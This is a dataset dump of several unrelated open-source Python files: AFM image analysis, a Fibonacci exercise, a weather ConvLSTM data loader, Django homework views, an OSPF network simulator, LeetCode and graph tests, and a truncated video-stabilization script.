ImageUtil.smart_colorbar(im=im,ax=ax,fig=fig,add_space_only=True)\n return fig\n\n\ndef _safe_apply(images,f):\n to_ret = []\n for ex in images:\n tmp = copy.deepcopy(ex)\n ret = f(ex)\n assert type(ret) is np.ndarray , \"{:s} didn't return array\".format(f)\n tmp.height = ret\n to_ret.append(tmp) \n return to_ret \n\ndef threshold(im,threshold_nm,rel_pct=50):\n \"\"\"\n Returns: im, height zeroed where height-rel_pct_of_height < threshold_nm\n \"\"\"\n height_rel = im.height_nm() \n height_rel -= np.percentile(height_rel,rel_pct)\n zero_idx = np.where(height_rel < threshold_nm)\n height_new = copy.deepcopy(im.height)\n height_new[zero_idx] = 0\n return height_new\n\ndef binarize(image):\n \"\"\"\n binarizes a single image: set to 1 where the image is non-zero\n \"\"\"\n binary = copy.deepcopy(image)\n binary[binary > 0] = 1\n return binary\n\ndef correct_background(images,**kw):\n \"\"\"\n See: threshold_images, except subtracts the AFM background \n \"\"\"\n return _safe_apply(images,lambda x: subtract_background(x,**kw))\n\n\ndef blur_images(images,sigma=0.5,**kw):\n \"\"\"\n See: thresholdimages, except adds a gaussian blur with sigma\n \"\"\"\n return _safe_apply(images,lambda x: gaussian(x.height,sigma=sigma,**kw))\n\ndef threshold_images(images,threshold_nm=0.2):\n \"\"\"\n thresholds the heights for each of images. pass by copy\n \"\"\"\n return _safe_apply(images,lambda x: threshold(x,threshold_nm))\n\ndef binarize_images(images):\n \"\"\"\n binarizes the heights for each of images. pass by copy\n \"\"\"\n return _safe_apply(images,lambda x: binarize(x.height))\n\ndef skeletonize_images(images):\n \"\"\"\n returns: the skeletonized version of the (assumed already binary) images\n \"\"\"\n return _safe_apply(images,lambda x: skeletonize(x.height))\n\ndef label_images(images):\n \"\"\"\n returns: the labelled versions (ie: connected components) of the (assumed\n skeletonized) images\n \"\"\"\n return _safe_apply(images,lambda x: measure.label(x.height,background=0))\n\ndef skeleton_filter(images):\n to_ret = []\n for i in images:\n tmp = copy.deepcopy(i)\n props = measure.regionprops(tmp.height)\n n = len(props)\n n_lost = 0\n for p in props:\n diameter = p.equivalent_diameter\n if (diameter < 5):\n for i,j in p.coords:\n tmp.height[i,j] = 0 \n n_lost += 1\n if (n_lost < n):\n to_ret.append(tmp)\n return to_ret\n\n\ndef cache_images(cache_dir,func,**kw):\n \"\"\"\n either caches or re-func to get an image transformaiton\n\n Args:\n cache_dir: where the cache is, or will be created\n func: functor (no arguments), re-reads everything if needed\n **kw: passed to CheckpointUtilities.multi_load\n Returns:\n cached imags\n \"\"\"\n return CheckpointUtilities.multi_load(cache_dir,load_func=func,\n name_func=FEC_Util.name_func,**kw)\n\ndef get_coordinate_path(coords): \n \"\"\"\n Returns a path of 'coords' (assumed a single coordinates of a \n skeleton) such that:\n\n 1) the start (endpoint) has the highest, second-lowest distance (the lowest\n distance is always +/- 1 pixel; the second lowest will be the greatest\n for an endpoint)\n \n 2) all other points are separated from each other by at most 1 pixel\n\n Args:\n coords: the two-column array of pixel distances\n Returns:\n the sorted coordinate list\n \"\"\"\n n_coords = len(coords)\n distances = scipy.spatial.distance_matrix(coords,coords,p=2)\n for i in range(n_coords):\n distances[i,i] = np.inf\n # check that the skeletonization is OK\n maximum_of_minimum_distances = np.sqrt(2)\n max_of_min = max(np.min(distances,axis=0))\n assert abs(max_of_min - maximum_of_minimum_distances) < 1e-6 , \\\n \"Skeletonization failed?\"\n # POST: distances okay; all pixels at most 1 away in x and y\n # Now we need to decide on (possible arbitrary) endpoints. These should\n # be the two nodes with the largest *second* lowest distances (all have\n # at least one neighbor which is +/- 1 pixel; 'interior' nodes have at \n # least two '1-pixel' neighbords\n second_lowest_distances = [sorted(row)[1] for row in distances]\n # sorted from low to high; what we want is the highest, second lowest\n sort_idx_second_highest = np.argsort(second_lowest_distances)\n endpoint = sort_idx_second_highest[-1]\n # POST: have endpoint. Add all the points with their two closest to the \n # graph (except the endpoint, where we only add its closest)\n # create a graph of all the pixels\n G = nx.Graph()\n n_neightbors = 2\n # sort the data so the endpoint is first?\n print(endpoint)\n sorted_idx = list(np.arange(endpoint,n_coords)) + \\\n list(np.arange(0,endpoint))\n sorted_idx= np.array(sorted_idx)\n distances = distances[sorted_idx]\n coords = coords[sorted_idx]\n for i in range(n_coords):\n dist_tmp = distances[i]\n closest_nodes = np.argsort(dist_tmp)\n # add the closest N\n j = 0\n G.add_edge(i,closest_nodes[0],weight=1)\n G.add_edge(i,closest_nodes[1],weight=1)\n print(\"connectivity\")\n remove_all_but_one = list(nx.minimum_edge_cut(G))\n for r in remove_all_but_one[:-1]:\n g.remove_edge(*r)\n print(nx.node_connectivity(G))\n nx.draw(G)\n plt.show()\n graph,path = single_chinese_postman_path(G)\n print(path,n_coords)\n for i in range(len(path)):\n print(len(set(path[:i])),i,n_coords)\n \"\"\"\n see: \nhttps://stackoverflow.com/questions/18794308/algorithm-to-cover-all-edges-given-starting-node\n\nhttps://networkx.github.io/documentation/networkx-1.9.1/reference/generated/networkx.algorithms.matching.max_weight_matching.html#networkx.algorithms.matching.max_weight_matching\n\n also https://groups.google.com/forum/#!topic/networkx-discuss/NxbsY2dzkNk\n \n https://healthyalgorithms.com/2009/03/23/aco-in-python-minimum-weight-perfect-matchings-aka-matching-algorithms-and-reproductive-health-part-4/\n \"\"\"\n coords_x = np.array(coords[:,0])\n coords_y = np.array(coords[:,1])\n\n return coords[path]\n\ndef snake_fit(image,initial,w_line=5,w_edge=0,max_px_move=1,beta=1,gamma=0.1):\n to_fit = image\n min_x,max_x = np.min(initial[:,0]),np.max(initial[:,0])\n min_y,max_y = np.min(initial[:,1]),np.max(initial[:,1])\n fudge_x = int(np.ceil((max_x-min_x) * 0.1))\n fudge_y = int(np.ceil((max_y-min_y) * 0.1))\n lower_x = 0#max(0,min_x-fudge_x)\n lower_y = 0#max(0,min_y-fudge_y)\n #to_fit = to_fit[lower_x:max_x+fudge_x,\n # lower_y:max_y+fudge_y]\n initial_x_shifted = initial[:,0]-lower_x\n initial_y_shifted = initial[:,1]-lower_y\n initial = np.array((initial_x_shifted,initial_y_shifted)).T\n min_image,max_image = np.min(to_fit),np.max(to_fit)\n to_fit = ((to_fit - min_image)/(max_image - min_image)) * 256\n to_fit = to_fit.astype(np.uint8)\n initial_snake = initial.astype(np.float64)\n snake = active_contour(to_fit,convergence=1e-3,max_iterations=5e3,\n snake=initial_snake,w_line=w_line,\n w_edge=w_edge,beta=beta,gamma=gamma,\n bc='fixed',max_px_move=max_px_move)\n snake[:,0] += lower_x\n snake[:,1] += lower_y\n return snake\n\n\ndef plot_fitting(image,coords,snake_coords=None):\n endpoint_coord = coords[0]\n n_coords = len(coords)\n x = coords[:,0]\n y = coords[:,1]\n idx = np.arange(n_coords)\n plt.imshow(image.T,origin='lower')\n plt.plot(coords[:,0],coords[:,1],',')\n plt.plot(endpoint_coord[0],endpoint_coord[1],'go')\n plt.plot(coords[:,0],coords[:,1],'r-',alpha=0.3)\n plt.xlim(min(coords[:,0])*0.8,max(coords[:,0]*1.1))\n plt.ylim(min(coords[:,1])*0.8,max(coords[:,1]*1.1))\n if (snake_coords is not None):\n plt.plot(snake_coords[:,0],snake_coords[:,1],'r.-',linewidth=0.3)\n\ndef get_spline_obj(image,coords,fudge=3,k=3,smooth_f_n=2):\n \"\"\"\n Returns:\n tuple of \n \"\"\"\n n_coords = len(coords)\n coords_x = coords[:,0]\n coords_y = coords[:,1]\n # threshold the image outside of the skeleton area of interest\n image_thresh = copy.deepcopy(image)\n zero_x_low = coords_x - fudge\n zero_x_high = coords_x + fudge\n zero_y_low = coords_y - fudge\n zero_y_high = coords_y + fudge\n # get a mask with ones in the region...\n m_arr = np.zeros(image.height.shape)\n for x_l,x_h,y_l,y_h in zip(zero_x_low,zero_x_high,\n zero_y_low,zero_y_high):\n m_arr[x_l:x_h,y_l:y_h] = 1\n image_thresh.height *= m_arr\n where_non_zero_image_xy =np.where(image_thresh.height > 0)\n where_non_zero_x,where_non_zero_y = where_non_zero_image_xy\n \"\"\"\n # Essentially trying to parameterize a curve basd on the skeleton. see: \nstackoverflow.com/questions/31464345/fitting-a-closed-curve-to-a-set-of-points\n also:\nstackoverflow.com/questions/32046582/spline-with-constraints-at-border/32421626#32421626\nstackoverflow.com/questions/36830942/reordering-image-skeleton-coordinates-to-make-interp1d-work-better\n https://stackoverflow.com/questions/41659075/how-to-specify-the-number-of-knot-points-when-using-scipy-splprep\n\n ... also ...\n\n https://stackoverflow.com/search?q=parametric+image+fit\n\n especially:\n\n stackoverflow.com/questions/22556381/approximating-data-with-a-multi-segment-cubic-bezier-curve-and-a-distance-as-wel/22582447#22582447\n\n and\n\n stackoverflow.com/questions/22556381/approximating-data-with-a-multi-segment-cubic-bezier-curve-and-a-distance-as-wel/22582447#22582447\n \"\"\"\n n_non_zero = where_non_zero_x.size\n # get the projection of the data onto the skeleton\n skel_idx = []\n weights = []\n for i,(x,y) in enumerate(zip(where_non_zero_x,where_non_zero_y)):\n diff = np.sqrt((coords_x-x)**2 + (coords_y-y)**2)\n closest_skeleton_idx = np.argmin(diff)\n skel_idx.append(closest_skeleton_idx)\n weights.append(image_thresh.height[x,y])\n # sort the projection array by the distance along...\n sort_idx = np.argsort(skel_idx)\n sorted_image_x = where_non_zero_x[sort_idx]\n sorted_image_y = where_non_zero_y[sort_idx]\n f_excess = where_non_zero_y.size/len(coords_x)\n # weight; sum by default is such that sum is M (being the size). use that\n weights = np.array(weights)[sort_idx]\n weights /= np.sum(weights)\n weights *= weights.size\n n_points = sorted_image_x.size\n tck,_ = splprep([sorted_image_x,sorted_image_y],w=weights,per=0,\n s=f_excess*n_points*smooth_f_n,k=k,u=None,quiet=0)\n return image_thresh,tck\n\ndef run():\n \"\"\"\n \n\n Args:\n param1: This is the first param.\n \n Returns:\n This is a description of what is returned.\n \"\"\"\n in_dir = \"./data/\"\n cache_dir_fmt = \"./cache_{:s}/\"\n cache_dir_raw = cache_dir_fmt.format(\"raw\")\n out_dir = in_dir\n force_def = dict(force=True)\n GenUtilities.ensureDirExists(out_dir)\n images = ImageUtil.cache_images_in_directory(pxp_dir=in_dir,\n cache_dir=cache_dir_raw,\n limit=4)\n corrected_dir = cache_dir_fmt.format(\"corrected\")\n label_dict = dict(cmap=plt.cm.spectral)\n transforms = [transform(\"corrected\",correct_background),\n transform(\"gaussian\",blur_images),\n transform(\"threshold\",threshold_images),\n transform(\"binarize\",binarize_images),\n transform(\"skeletonize\",skeletonize_images),\n transform(\"label\",label_images,label_dict),\n transform(\"skeleton_filter\",skeleton_filter,label_dict)]\n last = images\n all_transforms = [last]\n for tx in transforms:\n tmp_dir = cache_dir_fmt.format(tx.name)\n last = cache_images(tmp_dir,func = lambda: tx.function(last),\n **force_def)\n all_transforms.append(last)\n last_dir = tmp_dir\n # fit a spline to the original data using each of the connected\n # regions from the skeletonization \n for image,skeleton in zip([images[-2]],[last[-2]]):\n regions = measure.regionprops(skeleton.height)\n region = regions[0]\n coords = get_coordinate_path(region.coords)\n unew = np.linspace(0,1,endpoint=True,num=10*max(coords.shape))\n image_thresh,tck = get_spline_obj(image,coords)\n out = splev(unew,tck)\n out_x ,out_y = out[0],out[1]\n min_x,max_x = min(out_x),max(out_x)\n range_v = (max_x-min_x) * 0.2\n xlim = lambda : plt.xlim([min_x-range_v,max_x+range_v])\n ylim = lambda : plt.ylim([min(out_y)-range_v,max(out_y+range_v)])\n plt.subplot(2,1,1)\n plt.imshow(skeleton.height.T)\n plt.plot(coords[:,0],coords[:,1],'r-')\n xlim()\n ylim()\n plt.subplot(2,1,2)\n plt.imshow(image_thresh.height.T)\n plt.plot(out_x,out_y,'r-')\n plt.plot(coords[0,0],coords[0,1],'go')\n xlim()\n ylim()\n plt.show()\n fig = PlotUtilities.figure()\n plot_fitting(snake_input.height,coords)\n plt.plot(interp_x(ind_sort), interp_y(ind_sort), 'r,')\n out_name = \"{:s}_fit.png\".format(out_dir)\n PlotUtilities.savefig(fig,out_name)\n exit(1)\n # subtract the linear backround from each, save to a new cache \n for i in range(len(images)):\n pipeline = [x[i] for x in all_transforms]\n # add in the keywords for the first image...\n imshow_kw = [dict(cmap=plt.cm.afmhot)] + \\\n [tx.imshow_kw for tx in transforms]\n fig = plot_with_background_corrected(pipeline,imshow_kw_list=imshow_kw)\n img_name = FEC_Util.name_func(i,images[i])\n out_name = \"{:s}{:s}.png\".format(last_dir,img_name)\n PlotUtilities.savefig(fig,out_name)\n\n \n \n \nif __name__ == \"__main__\":\n run()\n","repo_name":"prheenan/Research","sub_path":"Perkins/Projects/DNA/protein-interactions/prc2/bulk_analysis/main_bulk_analysis.py","file_name":"main_bulk_analysis.py","file_ext":"py","file_size_in_byte":16301,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"}
+{"seq_id":"37383278602","text":"aux = a = 0\nb = 1\nn = int(input('Digite um Numero: '))\ni = 0\nprint('1 >> ',end='')\nwhile i != n:\n aux = a + b;\n a = b;\n b = aux;\n i += 1\n print(f'{aux} >> ',end='')\n","repo_name":"williancae/pythonGuanabara","sub_path":"mundo02/Exercicios/ex065.py","file_name":"ex065.py","file_ext":"py","file_size_in_byte":180,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"43935825455","text":"#\n# NOTE: This workflow is for predicting weather, using convolutional LSTM\n# architechture. The training data is a set of reanalysis data in the \n# past for one specific domain that are regular gridded at regular \n# intervals in the NETCDF format. This system consists of three stages\n# as given below: \n# \n# - Stage 1: reading NETCDF input and generating training dataset with a \n# given image sizes, number of frames, number of sample, and\n# number of channels, which are saved by pickle;\n# - Stage 2: import the saved pickle data and split this data into a lag\n# pair (X,Y), with the lag time (forecast lead time) prescribed \n# in advance). This stage will then build a convolutional LSTM\n# model with a given training/validation ratio, and then save\n# the train model under the name \"nwp_model_hhh\", where hhh is\n# forecast lead time. It also saves the history of training\n# in the form of pickle format for later analysis.\n# - Stage 3: testing the performance of the model by importing the best \n# trained model from Stage 2, and make a list of prediction \n# to be validated with the test data. Note that this stage is\n# best to run in the Jupyter notebook mode so the prediction\n# can be visuallly checked. \n#\n# INPUT: This Stage 1 script requires an input dataset in the NETCDF that contains\n# regular time frequency (e.g, every 3 or 6 hours), and should include\n# all basic meterological variables such as u, v, T, RH, pressure,... \n#\n# Remarks: Note that these data should be on the standard 19 vertical\n# levels 1000, 975, 950, 925, 900, 850, 800, 750, 700, 650, 600, \n# 550, 500, 450, 400, 350, 300, 250, 200. Also, all field vars must\n# be resized to cover an area of interest. \n#\n# OUTPUT: A set of training data in the with shape (sample_size, ny, nx, nchannel).\n# Note that array setting for NETCDF and Python are arraged such that\n# ny is the number of rows (depth), while nx is the number of col (width). \n#\n# HIST: - 12, Oct 23: Created by CK\n# - 10, Nov 23: revised for a better workflow for future upgrades\n# and sharing\n# - 16, Nov 23: Added 3-channel option for data generator\n#\n# AUTH: Chanh Kieu (Indiana University, Bloomington. Email: ckieu@iu.edu) \n#\n#==========================================================================\nimport netCDF4\nimport numpy as np\nimport os\nfrom tqdm import tqdm\nimport matplotlib.pyplot as plt\nimport cv2\nimport random\nimport pickle\nimport libtcg_netcdfloader as tcg_loader\nimport libtcg_utils as tcg_utils\nimport libtcg_fnl as tcg_fnl\nimport sys\nimport re\n#\n# This function returns a kist composing of [numpy data, label] that reads from the\n# set of NETCDF data under netcdf data path\n#\ndef main(rootdir,interval,nx,ny,number_channels,nframe,yyyy):\n print('Input data dir is: ',rootdir)\n frame = np.zeros([1,nframe,ny,nx,number_channels])\n i = 0 \n j = 0\n for img in tqdm(os.listdir(rootdir)):\n try:\n infile=rootdir+'/'+img\n cycle = tcg_fnl.path2cycle(infile) \n print('Processing file:',infile,cycle,interval*(nframe-1),frame.shape)\n last_cycle = tcg_utils.add_hour(cycle,interval*(nframe-1))\n last_file = tcg_fnl.cycle2path(rootdir,last_cycle)\n if len(yyyy) >= 4:\n match_year = re.search(\"fnl_\"+yyyy, infile) \n else:\n match_year = re.search(\"fnl_\", infile)\n #print('---> Last cycle/file:',last_cycle,last_file,match_year)\n if os.path.isfile(last_file) and match_year:\n if number_channels == 12: \n a = tcg_loader.frame12channels(rootdir,cycle,interval=interval,\n nx=nx,ny=ny,number_channels=number_channels,nframe=nframe)\n elif number_channels == 3:\n a = tcg_loader.frame3channels(rootdir,cycle,interval=interval,\n nx=nx,ny=ny,number_channels=number_channels,nframe=nframe)\n else:\n print(\"Channels must be 3 or 12 at the moment...exit\")\n exit()\n print('Data shape is :',a.shape,cycle)\n if i == 0:\n frame[0,:,:,:,:] = a[:,:,:,:]\n else:\n b = np.expand_dims(a, axis=0)\n frame = np.concatenate((frame, b), axis=0)\n del b\n i = i + 1\n else:\n print('Do not have enough cycles for frames or unmatch year...skip',cycle,last_cycle)\n except Exception as e:\n pass\n if match_year: j += 1\n if j > 199: \n print(\"Save the first 200 frames only... stop now\")\n break\n return frame\n#\n# This function reads in a list of 4 dim and plot a random field for quick check\n#\ndef check_visual(array_raw,plot_sample=1):\n print(\"Plotting one example from raw data input\")\n temp = np.array(array_raw[plot_sample])\n plot_channel = 2\n fig, axs = plt.subplots(2, 4, layout=\"constrained\",figsize=(13, 5))\n for i,ax in enumerate(axs.flat):\n CS = ax.contourf(temp[i,:,:,plot_channel])\n #ax.clabel(CS, inline=True, fontsize=10)\n #ax.colorbars()\n ax.set_title('t = 0')\n ax.grid()\n\n #plt.figure(figsize=(11, 8))\n #plt.subplot(1,4,2)\n #CS = plt.contour(temp[2,:,:,1])\n #plt.clabel(CS, inline=True, fontsize=10)\n #plt.title('t=-2')\n #plt.grid()\n plt.show()\n#\n# This is the main program. Need to edit several parameters including\n# rootdir, img_nx, img_ny, number_channels, nframe, interval_hr. See the\n# section below for where to change these parameters.\n#\nif __name__ == '__main__':\n n = len(sys.argv)\n print(\"Total arguments input are:\", n)\n print(\"Name of Python script:\", sys.argv[0])\n if n < 2:\n print(\"Need one input argument for the year to process...Stop\")\n print(\"+ Example for year 2007: nwp_convlstm_p1.py 2007\")\n print(\"+ Example for all years: nwp_convlstm_p1.py _\")\n exit()\n yyyy = str(sys.argv[1])\n\n rootdir=\"/N/project/hurricane-deep-learning/data/ncep_extracted_41x161_13vars/\"\n img_nx = 161 # number of lon points/width/col\n img_ny = 41 # number of lat points/depth/row\n number_channels = 3 # number of channels \n nframe = 9 # number of time frames\n interval_hr = -6 # hor interval between frames\n array_raw = main(rootdir,interval_hr,img_nx,img_ny,number_channels,nframe,yyyy)\n print(\"Raw output shape (nsample,nframe,ny,nx,nchannel) is: \",array_raw.shape)\n #\n # visualize a few variables for checking the input data. SHould be \"no\" \n # if running in the job submission mode at all times.\n #\n check_visualization = \"no\"\n if check_visualization== \"yes\":\n check_visual(array_raw,plot_sample=0)\n #\n # randomize data and save training data to an output for subsequent use\n #\n np.random.shuffle(array_raw)\n outfile = \"nwp_convlstm_\"+yyyy+\"_\"+str(number_channels)+\".pickle\"\n pickle_out = open(outfile,\"wb\")\n pickle.dump(array_raw, pickle_out)\n pickle_out.close()\n","repo_name":"kieucq/tcg_deep_learning","sub_path":"ConvLSTM/nwp_convlstm_p1.py","file_name":"nwp_convlstm_p1.py","file_ext":"py","file_size_in_byte":7411,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"31206115934","text":"from django.shortcuts import render,redirect\nfrom django.http import HttpResponse\nfrom .forms import HomeworkFrom\nfrom django.contrib.auth.models import User\nfrom .models import Homework \n\n# Create your views here.\ndef Homework_list(request):\n homework = Homework.objects.all()\n context = {'homework':homework}\n return render(request, 'HomeworkPublish/list.html',context)\n\ndef Homework_Publish(request,id):\n homework = Homework()\n if request.method == \"POST\":\n Homework_Publish_form = HomeworkFrom(data=request.POST)\n if Homework_Publish_form.is_valid():\n homework.courseNum = id\n homework.Homework_text = request.POST['Homework_text']\n homework.deadline_date = request.POST['deadline_date']\n homework.deadline_time = request.POST['deadline_time']\n homework.save()\n return HttpResponse(\"已发布,请返回刷新页面\")\n else:\n return HttpResponse(\"作业内容有误,请重新填写。\")\n return render(request,'HomeworkPublish/Publish.html',{'hw':homework})\n\ndef Homework_delete(request,id):\n homework = Homework.objects.get(id=id)\n context = {'homework':homework}\n homework.delete()\n return HttpResponse(\"已删除,请返回刷新页面\")","repo_name":"SoftwareGroupTen/demo","sub_path":"HomeworkPublish/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1276,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"33342699608","text":"import os\nimport setuptools\n\nwith open(\"README.md\", \"r\") as fh:\n long_description = fh.read()\n\nsetuptools.setup(\n name=\"geospaas_rest_api\",\n version=os.getenv('GEOSPAAS_REST_API_RELEASE', '0.0.0dev'),\n author=\"Adrien Perrin\",\n author_email=\"adrien.perrin@nersc.no\",\n description=\"REST API for GeoSPaaS\",\n long_description=long_description,\n long_description_content_type=\"text/markdown\",\n url=\"https://github.com/nansencenter/django-geo-spaas-rest-api\",\n packages=setuptools.find_packages(),\n classifiers=[\n \"Programming Language :: Python :: 3\",\n \"License :: OSI Approved :: GNU General Public License v3 (GPLv3)\",\n \"Operating System :: POSIX :: Linux\",\n ],\n python_requires='>=3.7',\n install_requires=[\n 'django_geo_spaas',\n 'django-filter',\n 'djangorestframework',\n 'djangorestframework-filters==1.0.0dev2',\n 'markdown'\n ],\n include_package_data=True,\n)\n","repo_name":"nansencenter/django-geo-spaas-rest-api","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":961,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"}
+{"seq_id":"18318008506","text":"from Entity.Router import *\nfrom Entity.Client import *\nfrom Entity.Link import *\nfrom Entity.Packet import *\nimport time\n\n\nclass Network:\n def __init__(self):\n self.routers = []\n self.clients = []\n self.links = []\n self.monitoringIsOn = True\n self.timer = 0\n\n def increaseTimes(self, second):\n for i in range(second):\n self.increaseTime()\n\n def existIdOfRouter(self, id):\n for router in self.routers:\n if router.id == id:\n return True\n return False\n\n def addRouter(self, idOfRouter):\n if self.existIdOfRouter(idOfRouter):\n raise Exception(\"router \" + str(idOfRouter) + \" is exist!\")\n return False\n else:\n self.routers.append(Router(str(idOfRouter), self))\n\n def getRouter(self, id):\n for router in self.routers:\n if router.id == str(id):\n return router\n raise Exception(\"perhaps something is wrong1\")\n return None\n\n def getClient(self, ip):\n for client in self.clients:\n if client.ip == str(ip):\n return client\n return None\n def addLink(self, link):\n if not link in self.links:\n self.links.append(link)\n\n def connectTwoRouter(self, idOfRouter1, idOfRouter2, wieghtOfLink):\n router1 = self.getRouter(idOfRouter1)\n router2 = self.getRouter(idOfRouter2)\n link = Link(idOfRouter1, idOfRouter2, wieghtOfLink, self)\n self.addLink(link)\n router1.connectToOther(link)\n\n def connectClientToRouter(self, ipOfClient, idOfRouter, weigthOfLink):\n client = self.getClient(ipOfClient)\n router = self.getRouter(idOfRouter)\n link = Link(ipOfClient, idOfRouter, weigthOfLink)\n self.addLink(link)\n router.connectToOther(link)\n\n def getLink(self, id1, id2):\n for link in self.links:\n if (link.firstNode == id1 and link.secondNode == id2) or (link.secondNode == id1 and link.firstNode == id2):\n return link\n return None\n\n def breakLink(self, router1, router2):\n link = self.getLink(str(router1), str(router2))\n link.isOk = False\n\n def repairLink(self, router1Id, router2Id):\n link = self.getLink(str(router1Id), str(router2Id))\n router1 = self.getRouter(router1Id)\n link.isOk = True\n router1.repairLink(link)\n\n def ping(self, client1, client2):\n router1 = self.getRouter(client1)\n router1.ping(client2)\n\n def enableMonitoring(self):\n self.monitoringIsOn = True\n\n def disableMonitoring(self):\n self.monitoringIsOn = False\n\n def increaseTime(self):\n self.timer += 1\n for router in self.routers:\n router.increaseTime()\n\n\n\nnetwork = Network()\nnetwork.disableMonitoring()\n\nfile = open(\"test.txt\", 'r')\nnextLing = file.readline()\nwhile nextLing != \"\":\n inp = nextLing.split(\" \")\n for i in range(len(inp)):\n inp[i] = inp[i].strip()\n if inp[0] == \"add\":\n network.addRouter(inp[2])\n elif inp[0] == \"connect\":\n network.connectTwoRouter(inp[1], inp[2], int(inp[3]))\n elif inp[0] == \"sec\":\n network.increaseTimes(int(inp[1]))\n elif inp[0] == \"ping\":\n network.ping(inp[1], inp[2])\n elif inp[0] == \"link\":\n if inp[3] == \"e\":\n network.repairLink(inp[1], inp[2])\n elif inp[3] == \"d\":\n network.breakLink(inp[1], inp[2])\n else:\n raise Exception(\"something wrong2\")\n else:\n raise Exception(\"something wrong3\")\n nextLing = file.readline()","repo_name":"0x16EF/OSPF_simulation","sub_path":"src/Network/Network.py","file_name":"Network.py","file_ext":"py","file_size_in_byte":3619,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"}
+{"seq_id":"35481284451","text":"# coding=utf8\n\n\"\"\"\n报数序列是指一个整数序列,按照其中的整数的顺序进行报数,得到下一个数。其前五项如下:\n1. 1\n2. 11\n3. 21\n4. 1211\n5. 111221\n6. 312211\n7. 13112221\n8. 1113213211\n9. 31131211131221\n10. 13211311123112112211\n给定一个正整数 n ,输出报数序列的第 n 项。\n注意:整数顺序将表示为一个字符串。\n\"\"\"\n\n# 思路:循环先前生成的序列,当发现两个不同的数时,添加[1,num]到新的序列中,发现相同的\n# 数时,添加[count, num]到新的序列中\n\n\nclass Solution(object):\n def countAndSay(self, n):\n \"\"\"\n :type n: int\n :rtype: str\n \"\"\"\n sequence = [1]\n for _ in range(n-1):\n next = []\n for num in sequence:\n if not next or next[-1] != num:\n next += [1, num]\n else:\n next[-2] += 1\n sequence = next\n\n return \"\".join(map(str, sequence))\n\n\nn = 10\na = Solution()\nprint(a.countAndSay(n))","repo_name":"PPythonic/LeecodePython","sub_path":"string/countAndsay.py","file_name":"countAndsay.py","file_ext":"py","file_size_in_byte":1077,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"}
+{"seq_id":"43252904271","text":"import pytest\nfrom slink.graphs import Graph, GraphNode\nfrom .conftest import graph_nodes, graph_edges\n\n\ndef test_add_node(graph_nodes):\n graph = Graph()\n node_a, _, _, _, _, _ = graph_nodes\n graph.add_node(node_a.data)\n assert len(graph.nodes) == 1\n assert node_a in graph.nodes\n\n\ndef test_add_edge(graph_nodes):\n graph = Graph()\n node_a, node_b, _, _, _, _ = graph_nodes\n graph.add_node(node_a.data)\n graph.add_node(node_b.data)\n graph.add_edge(node_a, node_b)\n assert node_b in node_a.neighbors\n\n\ndef test_remove_node(graph_edges):\n graph = Graph()\n node_a, node_b, node_c, _, _, _ = graph_edges\n graph.nodes = {node_a, node_b, node_c}\n graph.remove_node(node_b)\n assert len(graph.nodes) == 2\n assert node_b not in graph.nodes\n assert node_b not in node_a.neighbors\n assert node_b not in node_c.neighbors\n\n\ndef test_remove_edge(graph_edges):\n graph = Graph()\n node_a, node_b, node_c, _, _, _ = graph_edges\n graph.nodes = {node_a, node_b, node_c}\n node_a.add_neighbor(node_b)\n node_b.add_neighbor(node_c)\n graph.remove_edge(node_a, node_b)\n assert node_a.neighbors == []\n assert node_b.neighbors == [node_c]\n\n\ndef test_depth_first_search(graph_edges, capsys):\n graph = Graph()\n node_a, _, _, _, _, _ = graph_edges\n graph.nodes = {node_a}\n graph.depth_first_search(node_a)\n captured = capsys.readouterr()\n assert captured.out == \"A\\nB\\nC\\nD\\nE\\nF\\n\"\n\n\ndef test_breadth_first_search(graph_edges, capsys):\n graph = Graph()\n node_a, _, _, _, _, _ = graph_edges\n graph.nodes = {node_a}\n graph.breadth_first_search(node_a)\n captured = capsys.readouterr()\n assert captured.out == \"A\\nB\\nC\\nD\\nE\\nF\\n\"","repo_name":"jgfranco17/slink","sub_path":"tests/test_graphs.py","file_name":"test_graphs.py","file_ext":"py","file_size_in_byte":1712,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"}
+{"seq_id":"39925853152","text":"import cv2\nimport pandas as pd\nimport json\nfrom vidstab import VidStab\nimport os\n\ncount = 0\ntotal = 0\n\ndef processVideo(filename):\n stabilizer = VidStab()\n df_events = pd.DataFrame()\n df_summary = pd.DataFrame()\n fourcc = cv2.VideoWriter_fourcc(*'VP90')\n\n video_in = cv2.VideoCapture(f'./imports/{filename}.mp4')\n width = video_in.get(cv2.CAP_PROP_FRAME_WIDTH)\n height = video_in.get(cv2.CAP_PROP_FRAME_HEIGHT)\n fps = video_in.get(cv2.CAP_PROP_FPS)\n\n frames = video_in.get(cv2.CAP_PROP_FRAME_COUNT)\n fps = int(video_in.get(cv2.CAP_PROP_FPS))\n \n # calculate dusration of the video\n seconds = int(frames / fps)\n print(f'length: {seconds} seconds')\n\n if not os.path.isdir('./exports/' + filename):\n os.mkdir('./exports/' + filename)\n\n # Loads JSON track\n with open(f'./imports/{filename}.json') as f:\n data = json.load(f)['data']['tracks']\n df_events = pd.json_normalize(data, 'events')\n df_events = df_events[df_events['time'] <= seconds]\n\n total = df_events.groupby('uuid').ngroups\n\n def processTrack(df):\n uuid = df.name\n \n if os.path.isdir(f'./exports/{filename}/{uuid}'):\n return\n \n global count\n count = count + 1\n\n print(f'{count} / {total}')\n\n df_frames = df.sort_values(by=['time'])\n\n max_h = max(df_frames.height.max(), 100)\n max_w = max(df_frames.width.max(), 100)\n \n if not os.path.isdir(f'./exports/{filename}/{uuid}'):\n os.mkdir(f'./exports/{filename}/{uuid}')\n \n row = df_frames[df_frames['surprise']==df_frames['surprise'].max()]\n frame = round(row.time.values[0] * fps)\n video_in.set(cv2.CAP_PROP_POS_FRAMES, frame)\n ret, frame = video_in.read()\n x = 